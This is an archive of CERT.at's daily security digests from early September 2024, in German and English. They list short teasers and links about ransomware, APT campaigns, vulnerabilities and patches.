∗∗∗ Threat Assessment: North Korean Threat Groups ∗∗∗ --------------------------------------------- Explore Unit 42s review of North Korean APT groups and their impact, detailing the top 10 malware and tools weve seen from these threat actors. --------------------------------------------- https://unit42.paloaltonetworks.com/threat-assessment-north-korean-threat-g… ∗∗∗ Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware ∗∗∗ --------------------------------------------- Repellent Scorpius distributes Cicada3301 ransomware, using double extortion and targeting global victims since May 2024. We break down their toolset and more. --------------------------------------------- https://unit42.paloaltonetworks.com/repellent-scorpius-cicada3301-ransomwar… ∗∗∗ August 2024’s Most Wanted Malware: RansomHub Reigns Supreme While Meow Ransomware Surges ∗∗∗ --------------------------------------------- Check Point’s latest threat index reveals RansomHub’s continued dominance and Meow ransomware’s rise with novel tactics and significant impact. Check Point’s Global Threat Index for August 2024 revealed ransomware remains a dominant force, with RansomHub sustaining its position as the top ransomware group. This Ransomware-as-a-Service (RaaS) .. --------------------------------------------- https://blog.checkpoint.com/research/august-2024s-most-wanted-malware-ranso… ∗∗∗ CISA says SonicWall bug being exploited as experts warn of ransomware gang use ∗∗∗ --------------------------------------------- Federal cybersecurity experts are warning that a vulnerability affecting products from SonicWall is being exploited, and ordered all federal civilian agencies to implement a patch for the bug by the end of the month. --------------------------------------------- https://therecord.media/cisa-orders-patching-of-sonicwall-bug-ransomware ∗∗∗ CISA Releases Election Security Focused Checklists for Both Cybersecurity and Physical Security ∗∗∗ --------------------------------------------- Today, the Cybersecurity and Infrastructure Security Agency (CISA) released two election security checklists as part of the comprehensive suite of resources available for election officials, the Physical Security Checklist for Election Offices and Election Infrastructure Cybersecurity Readiness and Resilience Checklist. These checklists are tools to quickly review existing practices and take steps to enhance physical and cyber resilience in preparation for election day. --------------------------------------------- https://www.cisa.gov/news-events/news/cisa-releases-election-security-focus… ∗∗∗ Do We Need Yet Another Vulnerability Scoring System? If it’s SSVC that’s a resounding YASS ∗∗∗ --------------------------------------------- Want to know about Yet Another Vulnerability Scoring System (YASS)? Ben Edwards breaks down Stakeholder Specific Vulnerability Categorization and how to make it work. --------------------------------------------- https://www.bitsight.com/blog/do-we-need-yet-another-vulnerability-scoring-… ∗∗∗ Wegen US-Verbannung: Kaspersky-Kunden erhalten UltraAV von Pango ∗∗∗ --------------------------------------------- Nach dem Bann in den USA stellt das Unternehmen Kunden nun auf UltraAV um, bestätigt Kaspersky gegenüber heise online. --------------------------------------------- https://heise.de/-9862992 ===================== = Vulnerabilities = ===================== ∗∗∗ Citrix Releases Security Updates for Citrix Workspace App for Windows ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/09/10/citrix-releases-security… ∗∗∗ September 2024 Security Update ∗∗∗ --------------------------------------------- https://www.ivanti.com/blog/september-2024-security-update -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 09.09.2024
by Daily end-of-shift report 09 Sep '24

09 Sep '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 06-09-2024 18:00 − Montag 09-09-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Transport for London staff faces systems disruptions after cyberattack ∗∗∗ --------------------------------------------- Transport for London, the citys public transportation agency, revealed today that its staff has limited access to systems and email due to measures implemented in response to a Sunday cyberattack. --------------------------------------------- https://www.bleepingcomputer.com/news/security/transport-for-london-staff-f… ∗∗∗ Softwarefehler bei Landtagswahl: CCC kritisiert Intransparenz bei Wahlsoftware ∗∗∗ --------------------------------------------- Eine "stümperhafte Implementierung" könnte zu dem Berechnungsfehler bei der Landtagswahl in Sachsen geführt haben. Der CCC fordert mehr Transparenz. --------------------------------------------- https://www.golem.de/news/softwarefehler-bei-landtagswahl-ccc-kritisiert-in… ∗∗∗ Angriff auf Air-Gapped-Systeme: Malware exfiltriert Daten drahtlos durch den RAM ∗∗∗ --------------------------------------------- Die Angriffstechnik liefert zwar keine hohe Datenrate, für ein Keylogging in Echtzeit sowie das Ausleiten von Passwörtern und RSA-Keys reicht sie aber aus. --------------------------------------------- https://www.golem.de/news/angriff-auf-air-gapped-systeme-malware-exfiltrier… ∗∗∗ North Korean threat actor Citrine Sleet exploiting Chromium zero-day ∗∗∗ --------------------------------------------- Microsoft identified a North Korean threat actor exploiting a zero-day vulnerability in Chromium (CVE-2024-7971) to gain remote code execution (RCE) in the Chromium renderer process. Our assessment of ongoing analysis and observed infrastructure attributes this activity to Citrine Sleet, a North Korean threat actor that commonly targets the cryptocurrency .. --------------------------------------------- https://www.microsoft.com/en-us/security/blog/2024/08/30/north-korean-threa… ∗∗∗ The Underground World of Black-Market AI Chatbots is Thriving ∗∗∗ --------------------------------------------- An anonymous reader shares a report: ChatGPTs 200 million weekly active users have helped propel OpenAI, the company behind the chatbot, to a $100 billion valuation. But outside the mainstream theres still plenty of money to be made -- especially if youre catering to the underworld. Illicit large language models (LLMs) can make up to $28,000 in two months .. --------------------------------------------- https://slashdot.org/story/24/09/06/1648218/the-underground-world-of-black-… ∗∗∗ Hypervisor Development in Rust for Security Researchers (Part 1) ∗∗∗ --------------------------------------------- In the ever-evolving field of information security, curiosity and continuous learning drive innovation. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hypervisor-… ∗∗∗ Exploring an Experimental Windows Kernel Rootkit in Rust ∗∗∗ --------------------------------------------- Around two years ago, memN0ps took the initiative to create one of the first publicly available rootkit proof of concepts (PoCs) in Rust as an experimental project, while learning a new programming language. It still lacks many features, which are relatively easy to add once the concept is understood, but it was developed within a month, at a part-time capacity. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/exploring-a… ∗∗∗ Predator Spyware Resurfaces With Fresh Infrastructure ∗∗∗ --------------------------------------------- Recorded Future observes renewed Predator spyware activity on fresh infrastructure after a drop caused by US sanctions. --------------------------------------------- https://www.securityweek.com/predator-spyware-resurfaces-with-fresh-infrast… ∗∗∗ Chinese APT Abuses VSCode to Target Government in Asia ∗∗∗ --------------------------------------------- A first in our telemetry: Chinese APT Stately Taurus uses Visual Studio Code to maintain a reverse shell in victims environments for Southeast Asian espionage. --------------------------------------------- https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-… ∗∗∗ Sextortion-Betrugsversuch I: Aufzeichnung des Porno-Konsums; und "Rechnungszahlung" ∗∗∗ --------------------------------------------- Aktuell laufen wieder sogenannte Sextortion-Kampagnen, bei der Opfer per E-Mail mit angeblich kompromittierendem Material erpresst werden sollen. Ich fasse daher einige Informationen der letzten Tage über laufende Sextortion-Kampagnen in .. --------------------------------------------- https://www.borncity.com/blog/2024/09/09/sextortion-betrugsversuch-i-aufzei… ∗∗∗ AI Firm’s Misconfigured Server Exposed 5.3 TB of Mental Health Records ∗∗∗ --------------------------------------------- A misconfigured server from a US-based AI healthcare firm Confidant Health exposed 5.3 TB of sensitive mental health… --------------------------------------------- https://hackread.com/ai-firm-misconfigured-server-exposed-mental-health-dat… ∗∗∗ CISA Adds Three Known Exploited Vulnerabilities to Catalog ∗∗∗ --------------------------------------------- CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/09/09/cisa-adds-three-known-ex… ∗∗∗ Eigene Identität im Blick: Google Dark Web Report warnt vor Datenlecks ∗∗∗ --------------------------------------------- Mit dem Dark Web Report von Google lässt sich die eigene Identität auf Datenpannen überwachen. Der Dienst ist nun kostenlos und nicht mehr Abo-Bestandteil. --------------------------------------------- https://heise.de/-9860797 ∗∗∗ Polen zerschlägt Ring von Cybersaboteuren ∗∗∗ --------------------------------------------- Das EU- und Nato-Land Polen ist zunehmend Ziel von Cyberattacken. Warschau vermutet dahinter die Tätigkeit russischer und belarussischer Geheimdienste. --------------------------------------------- https://heise.de/-9862555 ===================== = Vulnerabilities = ===================== ∗∗∗ ZDI-24-1196: Adobe Acrobat Reader DC Doc Object Use-After-Free Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- This vulnerability allows remote attackers to disclose sensitive information on affected installations of Adobe Acrobat Reader DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2024-45107. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1196/ ∗∗∗ DSA-5767-1 thunderbird - security update ∗∗∗ --------------------------------------------- https://lists.debian.org/debian-security-announce/2024/msg00180.html ∗∗∗ Security Vulnerabilities fixed in Firefox ESR 115.13 ∗∗∗ --------------------------------------------- https://www.mozilla.org/en-US/security/advisories/mfsa2024-30/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 06.09.2024
by Daily end-of-shift report 06 Sep '24

06 Sep '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 05-09-2024 18:00 − Freitag 06-09-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ US charges Russian GRU hackers behind WhisperGate intrusions ∗∗∗ --------------------------------------------- Feds post $10 million bounty for each of the sixs whereabouts The US today charged five Russian military intelligence officers and one civilian for their involvement with the data-wiping WhisperGate campaign conducted against Ukraine in January 2022 before the ground invasion began. --------------------------------------------- https://www.theregister.com/2024/09/05/uncle_sam_charges_russian_gru/ ∗∗∗ Ransomware Gang Claims Cyberattack on Planned Parenthood ∗∗∗ --------------------------------------------- Planned Parenthood confirms "cybersecurity incident" as RansomHub ransomware gang threatens to leak 93 Gb of data stolen from the nonprofit last week. --------------------------------------------- https://www.securityweek.com/ransomware-gang-claims-cyberattack-on-planned-… ∗∗∗ Sicherheitslücken in Veeam Backup & Replication - Updates verfügbar ∗∗∗ --------------------------------------------- Der Softwarehersteller Veeam hat Aktualisierungen für mehrere seiner Produkte veröffentlicht. Unter den Sicherheitslücken die im Rahmen dieser Veröffentlichung behoben wurden befindet sich CVE-2024-40711, eine schwerwiegende Schwachstelle in Veeam Backup & Replication. Die Ausnutzung dieser Lücke ermöglicht es Angreifer:innen unauthentifiziert .. --------------------------------------------- https://www.cert.at/de/aktuelles/2024/9/sicherheitslucken-in-veeam-backup-r… ∗∗∗ Aktive Ausnutzung einer Sicherheitslücke in SonicWall SonicOS (CVE-2024-40766) ∗∗∗ --------------------------------------------- Der Hersteller SonicWall hat am 21.08.2024 ein Advisory zu einer schwerwiegenden Sicherheitslücke in seinem Betriebssystem für Netzwerkgeräte, SonicOS, veröffentlicht. Die Ausnutzung besagter Schwachstelle, CVE-2024-40766, könnte es Angreifer:innen erlauben, betroffene Geräte zum Absturz zu bringen. Zeitgleich mit der .. --------------------------------------------- https://www.cert.at/de/aktuelles/2024/9/aktive-ausnutzung-einer-sicherheits… ∗∗∗ Colombian president suggests prior administration illegally sent $11 million in cash to Israel for spyware ∗∗∗ --------------------------------------------- Colombia’s President Gustavo Petro said Wednesday that his administration is probing the disappearance of $11 million allegedly used to buy powerful Pegasus spyware, which he said he believes was acquired by the previous administration. --------------------------------------------- https://therecord.media/colombian-president-pegasus-spyware-israel-missing-… ∗∗∗ Passwort Spraying-Angriffe auf (Sophos-) Firewalls von IP 92.53.65.166 ∗∗∗ --------------------------------------------- Kurze Information für Administratoren von Sophos Firewalls - ein Leser hat mich darauf hingewiesen, dass er seit dem seit dem 5. September 2024 vermehrt Angriffsversuche auf seine Firewalls von Sophos beobachtet. Und speziell das VPN-Portal wird über Port 443 mit Login-Versionen überschüttet .. --------------------------------------------- https://www.borncity.com/blog/2024/09/06/passwort-spraying-angriffe-auf-sop… ∗∗∗ Hunting Chromium Notifications ∗∗∗ --------------------------------------------- Browser notifications provide social-engineering opportunities. In this post well cover the associated forensic artifacts, threat hunting possibilities and hardening recommendations. --------------------------------------------- https://blog.nviso.eu/2024/09/06/hunting-chromium-notifications/ ∗∗∗ The best and worst ways to get users to improve their account security ∗∗∗ --------------------------------------------- In my opinion, mandatory enrollment is best enrollment. --------------------------------------------- https://blog.talosintelligence.com/threat-source-newsletter-sept-5-2024/ ===================== = Vulnerabilities = ===================== ∗∗∗ ZDI-24-1195: Malwarebytes Antimalware Link Following Local Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1195/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 05.09.2024
by Daily end-of-shift report 05 Sep '24

05 Sep '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 04-09-2024 18:00 − Donnerstag 05-09-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Hacker trap: Fake OnlyFans tool backstabs cybercriminals, steals passwords ∗∗∗ --------------------------------------------- Hackers are targeting other hackers with a fake OnlyFans tool that claims to help steal accounts but instead infects threat actors with the Lumma stealer information-stealing malware. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hacker-trap-fake-onlyfans-to… ∗∗∗ Windows 11/Server 2024 SMB Security-Hardening ∗∗∗ --------------------------------------------- Microsoft hat im Vorgriff auf die kommenden Releases von Windows 11 24H2 und Windows Server 2025 Ende August 2024 einen Techcommunity-Beitrag zum Thema "SMB Security-Hardening" veröffentlicht. Das Ganze ist Teil der Microsoft Secure Future Initiative (SFI), und die Betriebssysteme sollen bereits vom Start an über gehärtete SMB-Einstellungen verfügen, um sich vor Cyberangriffen besser zu schützen. --------------------------------------------- https://www.borncity.com/blog/2024/09/05/windows-11-server-2024-smb-securit… ∗∗∗ CVE-2024-45195: Apache OFBiz Unauthenticated Remote Code Execution (Fixed) ∗∗∗ --------------------------------------------- Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution (CVE-2024-45195) on Linux and Windows. Exploitation is facilitated by bypassing previous patches. [..] Based on our analysis, three of these vulnerabilities are, essentially, the same vulnerability with the same root cause. Since the patch bypass we are disclosing today elaborates on those previous disclosures, we’ll outline them now. --------------------------------------------- https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-una… ∗∗∗ Watch the Typo: Our PoC Exploit for Typosquatting in GitHub Actions ∗∗∗ --------------------------------------------- In this blog, we explain how we managed to leverage typosquatting in GitHub Actions and got several applications with inadvertent typos to run our ‘fake’ action. If we had bad intentions, these mistakenly triggered actions could have included malicious code, for instance installing malware, stealing secrets, or making covert changes to code. --------------------------------------------- https://orca.security/resources/blog/typosquatting-in-github-actions/ ∗∗∗ Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401 ∗∗∗ --------------------------------------------- On July 1, the project maintainers released an advisory for the vulnerability CVE-2024-36401 (CVSS score: 9.8). Multiple OGC request parameters allow remote code execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. The shortcoming has been addressed in versions 2.23.6, 2.24.4, and 2.25.2. [..] In this article, we will explore the details of the payload and malware. --------------------------------------------- https://feeds.fortinet.com/~/904077668/0/fortinet/blogs~Threat-Actors-Explo… ===================== = Vulnerabilities = ===================== ∗∗∗ Veeam warns of critical RCE flaw in Backup & Replication software ∗∗∗ --------------------------------------------- Veeam has released security updates for several of its products as part of a single September 2024 security bulletin that addresses 18 high and critical severity flaws in Veeam Backup & Replication, Service Provider Console, and One. --------------------------------------------- https://www.bleepingcomputer.com/news/security/veeam-warns-of-critical-rce-… ∗∗∗ Angreifer können durch Hintertür in Cisco Smart Licensing Utility schlüpfen ∗∗∗ --------------------------------------------- Aufgrund von mehreren Schwachstellen sind Attacken auf Cisco Expressway Edge, Duo Epic for Hyperdrive, Identity Services Engine, Meraki Systems Manager und Smart Licensing Utility vorstellbar. [..] Smart Licensing Utility ist durch zwei "kritische" Sicherheitslücken (CVE-2024-20439, CVE-2024-20440) bedroht. Im ersten Fall kann ein entfernter Angreifer ohne Anmeldung aufgrund von statischen Admin-Zugangsdaten auf Instanzen zugreifen. Mit den Adminrechten des Accounts erlangt ein Angreifer die volle Kontrolle. [..] Meraki Systems Manager Agent for Windows kann sich aufgrund einer Lücke (CVE-2024-20430 "hoch") an einer mit Schadcode präparierten DLL-Datei verschlucken. [..] --------------------------------------------- https://heise.de/-9857962 ∗∗∗ Drupal: Security advisories 2024-September-04 ∗∗∗ --------------------------------------------- Drupal released 5 security advisories (1x Critical, 4x Moderately critical) --------------------------------------------- https://www.drupal.org/security ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (bubblewrap and flatpak, containernetworking-plugins, fence-agents, ghostscript, krb5, orc, podman, python3.11, python3.9, resource-agents, runc, and wget), Debian (chromium, cinder, glance, gnutls28, nova, nsis, python-oslo.utils, ruby-sinatra, and setuptools), Fedora (kernel), Oracle (bubblewrap and flatpak, buildah, containernetworking-plugins, fence-agents, ghostscript, gvisor-tap-vsock, kernel, krb5, libndp, nodejs:18, orc, podman, postgresql, python-urllib3, python3.11, python3.12, python3.9, runc, skopeo, and wget), SUSE (hdf5, netcdf, trilinos), and Ubuntu (firefox, imagemagick, ironic, openssl, python-django, vim, and znc). --------------------------------------------- https://lwn.net/Articles/989046/ ∗∗∗ Juniper: SA Series: Multiple vulnerabilities resolved in Juniper Secure Analytics in 7.5.0 UP9 IF02 ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/On-Demand-JSA-Series-Multiple-v… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 04.09.2024
by Daily end-of-shift report 04 Sep '24

04 Sep '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 03-09-2024 18:00 − Mittwoch 04-09-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ YubiKeys klonen? ∗∗∗ --------------------------------------------- Heute gab es dazu eine reißerische Meldung: diese lassen sich klonen. [..] Das ist mal klarerweise nicht gut. Aber wie so oft bei Schlagzeilen dieser Art lohnt es sich, genauer zu lesen, was eigentlich passiert ist, und wie realistisch die Angriffe wirklich sind. --------------------------------------------- https://www.cert.at/de/blog/2024/9/yubikeys-eucleak ∗∗∗ Hackers Hijack 22,000 Removed PyPI Packages, Spreading Malicious Code to Developers ∗∗∗ --------------------------------------------- A new supply chain attack technique targeting the Python Package Index (PyPI) registry has been exploited in the wild in an attempt to infiltrate downstream organizations. It has been codenamed Revival Hijack by software supply chain security firm JFrog, which said the attack method could be used to hijack 22,000 existing PyPI packages and result in "hundreds of thousands" of malicious package downloads. --------------------------------------------- https://thehackernews.com/2024/09/hackers-hijack-22000-removed-pypi.html ∗∗∗ Hackers inject malicious JS in Cisco store to steal credit cards, credentials ∗∗∗ --------------------------------------------- Ciscos site for selling company-themed merchandise is currently offline and under maintenance due to hackers compromising it with JavaScript code that steals sensitive customer details provided at checkout. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hackers-inject-malicious-js-… ∗∗∗ Mallox ransomware: in-depth analysis and evolution ∗∗∗ --------------------------------------------- In this report, we provide an in-depth analysis of the Mallox ransomware, its evolution, ransom strategy, encryption scheme, etc. --------------------------------------------- https://securelist.com/mallox-ransomware/113529/ ∗∗∗ Earth Lusca Uses KTLVdoor Backdoor for Multiplatform Intrusion ∗∗∗ --------------------------------------------- While monitoring Earth Lusca, we discovered the threat group’s use of KTLVdoor, a highly obfuscated multiplatform backdoor, as part of a large-scale attack campaign. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/i/earth-lusca-ktlvdoor.html ∗∗∗ Advanced forensic techniques for recovering hidden data in wearable device ∗∗∗ --------------------------------------------- This blog post covers how forensic skills and tooling can be used to recover potentially sensitive data left on phones from devices such as Google’s Fitbit. The principles and techniques here also apply to similar products with similar functionality. --------------------------------------------- https://www.pentestpartners.com/security-blog/advanced-forensic-techniques-… ∗∗∗ Vorsicht vor US Green Card Lotterie Anbietern wie AmericanGC.com ∗∗∗ --------------------------------------------- Die USA gelten für viele als Wunschziel fürs Auswandern. Über die Green Card Lotterie wird bis zu 50.000 Menschen jährlich eine Einwanderung mit Greencard ermöglicht. Der Andrang auf diese Lotterie ist groß und das machen sich auch unseriöse und betrügerische Anbieter wie AmericanGC.com zunutze. --------------------------------------------- https://www.watchlist-internet.at/news/green-card-americangccom/ ∗∗∗ US-Behörden sollen Internet-Routing absichern ∗∗∗ --------------------------------------------- Das Weiße Haus macht Druck auf Behörden: Sie sollen ihre Netzrouten kryptografisch absichern. Erst dann können Fehler auffallen. --------------------------------------------- https://heise.de/-9856483 ∗∗∗ Mesh-WLAN von Plume Design: Teure Bespitzelung ∗∗∗ --------------------------------------------- Mesh-Netzwerke sind gut gegen WLAN-Funklöcher. Doch Vorsicht: Ein US-Hersteller überwacht mit seinen Routern und Extendern Nutzer und gibt munter vertrauliche Daten weiter. Eine Recherche von Erik Bärwaldt (Datenschutz, WLAN) --------------------------------------------- https://www.golem.de/news/mesh-wlan-von-plume-design-teure-bespitzelung-240… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (buildah, gvisor-tap-vsock, nodejs:18, python-urllib3, and skopeo), Debian (firefox-esr and openssl), Fedora (apr and seamonkey), Red Hat (podman), Slackware (mozilla and seamonkey), SUSE (bubblewrap and flatpak, buildah, docker, dovecot23, ffmpeg, frr, go1.21-openssl, graphviz, java-1_8_0-openj9, kubernetes1.26, kubernetes1.27, kubernetes1.28, openssl-1_0_0, openssl-3, perl-DBI, python-aiohttp, python-Django, python-WebOb, thunderbird, tiff, ucode-intel, unbound, webkit2gtk3, and xen), and Ubuntu (drupal7 and twisted). --------------------------------------------- https://lwn.net/Articles/988746/ ∗∗∗ Android Patchday: Updates schließen mehrere hochriskante Lücken ∗∗∗ --------------------------------------------- Jetzt ist es an den Handy-Herstellern, die sicherheitsrelevanten Fehlerkorrekturen in Firmware-Updates für die Android-Smartphones zu gießen und an die betroffenen Kunden zu verteilen. --------------------------------------------- https://heise.de/-9856847 ∗∗∗ WordPress Plugin "Advanced Custom Fields" vulnerable to cross-site scripting ∗∗∗ --------------------------------------------- https://jvn.jp/en/jp/JVN67963942/ ∗∗∗ Progress: OpenEdge Third-Party Vulnerabilities Fixed In OpenEdge LTS Update 11.7.20 ∗∗∗ --------------------------------------------- https://community.progress.com/s/article/OpenEdge-Third-Party-Vulnerabiliti… ∗∗∗ Hitachi Energy: Multiple vulnerabilities in Hitachi Energy MicroSCADA X SYS600 product ∗∗∗ --------------------------------------------- https://publisher.hitachienergy.com/preview?DocumentID=8DBD000160&LanguageC… ∗∗∗ Zyxel security advisory for OS command injection vulnerability in APs and security router devices ∗∗∗ --------------------------------------------- https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-… ∗∗∗ Zyxel security advisory for buffer overflow vulnerability in some 5G NR CPE, DSL/Ethernet CPE, fiber ONT, WiFi extender, and security router devices ∗∗∗ --------------------------------------------- https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-… ∗∗∗ Mozilla: Security Vulnerabilities fixed in Firefox and Focus ∗∗∗ --------------------------------------------- https://www.mozilla.org/en-US/security/advisories/ ∗∗∗ C-MOR: Mehrere Sicherheitsschwachstellen in Videoüberwachungssoftware C-MOR (SYSS-2024-020 bis -030) ∗∗∗ --------------------------------------------- https://www.syss.de/pentest-blog/mehrere-sicherheitsschwachstellen-in-video… ∗∗∗ F5: K000140908: MySQL Server vulnerabiliity CVE-2024-21134 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000140908 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 03.09.2024
by Daily end-of-shift report 03 Sep '24

03 Sep '24

===================== = End-of-Day report = ===================== Timeframe: Montag 02-09-2024 18:00 − Dienstag 03-09-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ D-Link says it is not fixing four RCE flaws in DIR-846W routers ∗∗∗ --------------------------------------------- D-Link is warning that four remote code execution (RCE) flaws impacting all hardware and firmware versions of its DIR-846W router will not be fixed as the products are no longer supported. [..] The researcher published the information on August 27, 2024, but has withheld the publication of proof-of-concept (PoC) exploits for now. --------------------------------------------- https://www.bleepingcomputer.com/news/security/d-link-says-it-is-not-fixing… ∗∗∗ The state of sandbox evasion techniques in 2024 ∗∗∗ --------------------------------------------- This post is about sandbox evasion techniques and their usefulness in more targeted engagements. --------------------------------------------- https://fudgedotdotdot.github.io/posts/sandbox-evasion-in-2024/sandboxes.ht… ∗∗∗ CVE-2024-37084: Spring Cloud Remote Code Execution ∗∗∗ --------------------------------------------- CVE-2024-37084 is a critical security vulnerability in Spring Cloud Skipper, specifically related to how the application processes YAML input. [..] The vulnerability affects versions 2.11.0 through 2.11.3 of Spring Cloud Skipper. --------------------------------------------- https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/ ∗∗∗ Intel Responds to SGX Hacking Research ∗∗∗ --------------------------------------------- Intel has shared some clarifications on claims made by a researcher regarding the hacking of its SGX security technology. --------------------------------------------- https://www.securityweek.com/intel-responds-to-sgx-hacking-research/ ∗∗∗ Rechnungen und Mahnungen von cvneed.com ignorieren ∗∗∗ --------------------------------------------- Sie haben einen Lebenslauf auf cvneed.com erstellt? Sie sind davon ausgegangen, dass dies kostenlos ist? Doch plötzlich flattern Rechnungen und sogar Mahnungen ins Haus? Ignorieren Sie diese und zahlen Sie nichts. Es handelt sich um eine Abo-Falle! --------------------------------------------- https://www.watchlist-internet.at/news/mahnungen-von-cvneed/ ∗∗∗ CISA Adds Three Known Exploited Vulnerabilities to Catalog ∗∗∗ --------------------------------------------- CVE-2021-20123/CVE-2021-20124 Draytek VigorConnect Path Traversal Vulnerability, CVE-2024-7262 Kingsoft WPS Office Path Traversal Vulnerability --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/09/03/cisa-adds-three-known-ex… ∗∗∗ Threat actors using MacroPack to deploy Brute Ratel, Havoc and PhantomCore payloads ∗∗∗ --------------------------------------------- Cisco Talos recently discovered several related Microsoft Office documents uploaded to VirusTotal by various actors between May and July 2024 that were all generated by a version of a payload generator framework called “MacroPack.” --------------------------------------------- https://blog.talosintelligence.com/threat-actors-using-macropack/ ∗∗∗ A look into Web Application Security ∗∗∗ --------------------------------------------- An in-depth look into Web Application Security, and Bitsights approach to related security metrics. --------------------------------------------- https://www.bitsight.com/blog/look-web-application-security ===================== = Vulnerabilities = ===================== ∗∗∗ Zyxel: Mehrere hochriskante Sicherheitslücken in Firewalls ∗∗∗ --------------------------------------------- Zyxel warnt vor mehreren Sicherheitslücken in den Firewalls des Unternehmens. Updates stehen bereit, die Lecks abdichten. [..] Am schwerwiegendsten ist eine Lücke, die Angreifern das Einschleusen von Befehlen im IPSec VPN der Zyxel-Firewalls ermöglicht. Mit manipulierten Nutzernamen können sie Befehle schmuggeln, die vom Betriebssystem ausgeführt werden. --------------------------------------------- https://heise.de/-9855938 ∗∗∗ VMSA-2024-0018:VMware Fusion update addresses a code execution vulnerability (CVE-2024-38811) ∗∗∗ --------------------------------------------- VMware Fusion contains a code-execution vulnerability due to the usage of an insecure environment variable. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.8. --------------------------------------------- https://support.broadcom.com/web/ecx/support-=content-notification/-/extern… ∗∗∗ OpenSSL Security Advisory [3rd September 2024] ∗∗∗ --------------------------------------------- Possible denial of service in X.509 name checks (CVE-2024-6119) [..] OpenSSL 3.3, 3.2, 3.1 and 3.0 are vulnerable to this issue. --------------------------------------------- https://openssl-library.org/news/secadv/20240903.txt ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (python3.12), Debian (calibre, exfatprogs, frr, git, libtommath, nbconvert, ruby-nokogiri, ruby-tzinfo, and webkit2gtk), Fedora (flatpak, lua-mpack, and python3.12), Red Hat (389-ds-base, 389-ds:1.4, buildah, fence-agents, gvisor-tap-vsock, httpd:2.4, kernel, kernel-rt, nodejs:18, orc, postgresql, postgresql:12, postgresql:13, postgresql:15, python-urllib3, python3.12, and skopeo), SUSE (389-ds, bubblewrap and flatpak, cacti, cacti-spine, curl, glib2, kernel-firmware, libqt5-qt3d, libqt5-qtquick3d, opera, python39, qemu, unbound, xen, and zziplib), and Ubuntu (ffmpeg, linux-raspi-5.4, and python-webob). --------------------------------------------- https://lwn.net/Articles/988570/ ∗∗∗ Chrome 128 Updates Patch High-Severity Vulnerabilities ∗∗∗ --------------------------------------------- https://www.securityweek.com/chrome-128-updates-patch-high-severity-vulnera… ∗∗∗ Lenze: Install Directory with insufficient permissions ∗∗∗ --------------------------------------------- https://certvde.com/de/advisories/VDE-2024-053/ ∗∗∗ LOYTEC Electronics LINX Series ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-247-01 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 02.09.2024
by Daily end-of-shift report 02 Sep '24

02 Sep '24

